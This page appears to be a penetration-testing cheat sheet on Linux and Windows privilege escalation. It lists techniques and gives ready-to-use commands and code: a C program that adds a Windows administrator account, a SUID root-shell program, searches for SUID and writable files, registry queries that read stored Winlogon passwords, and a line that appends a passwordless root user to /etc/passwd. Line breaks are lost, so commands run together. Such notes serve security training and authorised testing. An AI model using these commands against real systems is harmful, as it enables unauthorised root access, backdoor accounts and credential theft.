Skip to content

Privilege Escalation

Privilege escalation means gaining higher levels of access or permissions within a system or network beyond what was initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges from a lower-privileged user or account to gain control over more sensitive resources or execute commands with increased authority.

Linux Privilege Escalation

  • sudo -l
  • Kernel Exploits
  • OS Exploits
  • Password reuse (mysql, .bash_history, 000-default.conf...)
  • Known binaries with suid flag and interactive (nmap)
  • Custom binaries with suid flag either using other binaries or with command execution
  • Writable files owned by root that get executed (cronjobs)
  • MySQL as root
  • Vulnerable services (chkrootkit, logrotate)
  • Writable /etc/passwd
  • Readable .bash_history
  • SSH private key
  • Listening ports on localhost
  • /etc/fstab
  • /etc/exports
  • /var/mail
  • Process as other user (root) executing something you have permissions to modify
  • SSH public key + Predictable PRNG
  • apt update hooking (Pre-Invoke)
  • Capabilities

Windows Privilege Escalation

  • Kernel Exploits
  • OS Exploits
  • Pass The Hash
  • Password reuse
  • DLL hijacking (Path)
  • Vulnerable services
  • Writable services binaries path
  • Unquoted services
  • Listening ports on localhost
  • Registry keys

Kernel Exploits



Windows Add User

#include  /* system, NULL, EXIT_FAILURE */​int main (){  int i;  i=system ("net user   /add && net localgroup administrators  /add");  return 0;}

SUID Change

SUID​Set owner user ID.​int main(void){  setresuid(0, 0, 0);  system("/bin/bash");}​

Privilege Escalation:

#Find Binaries that will execute as the ownerfind / -perm -u=s -type f 2>/dev/null
​#Find binaries that will execute as the groupfind / -perm -g=s -type f 2>/dev/null
​#Find sticky-bit binariesfind / -perm -1000 -type d 2>/dev/null​find / -perm -4000 2>/dev/null​writable by everyonefind / -writable -type f 2>/dev/null​World writeable directoriesfind / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root​World writeable filesfind / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null​Writeable config filesfind /etc/ -writable -type f 2>/dev/null​find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null​

Window Exploit Suggester

python2 --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quietpython –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls

Windows Priv Escalation

AlwaysInstallElevatedCheck if the following registry settings are set to "1"reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"​

Basic Linux Enumeration

Distribution type & kernel versioncat /etc/*release*uname -arpm -q kerneldmesg | grep -i linux​Default writeable directory / folder/tmp/dev/shm​Search for passwordsSearch for password within config.phpgrep -R 'password' config.php​Find possible other writeable directory / folderfind / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;​Service(s) running as root userps aux | grep rootps -ef | grep root​Installed applicationsls -lah /usr/bin/ls -lah /sbin/dpkg -lrpm -qals -lah /var/cache/apt/archivesOls -lah /var/cache/yum/​Scheduled jobscrontab -lls -la /etc/cron*ls -lah /var/spool/cronls -la /etc/ | grep croncat /etc/crontabcat /etc/anacrontab​Find pattern in file:grep -rnw '/etc/passwd' -e 'root'​Sticky bit, SGID, SUID, GUIDSticky bitfind / -perm -1000 -type d 2>/dev/null​SGID (chmod 2000)find / -perm -g=s -type f 2>/dev/null​SUID (chmod 4000)find / -perm -u=s -type f 2>/dev/nullfind /* -user root -perm -4000 -print 2>/dev/null​SUID or GUIDfind / -perm -g=s -o -perm -u=s -type f 2>/dev/null​Add user to /etc/passwd and root groupecho hodor::0:0:root:/root:/bin/bash >> /etc/passwd​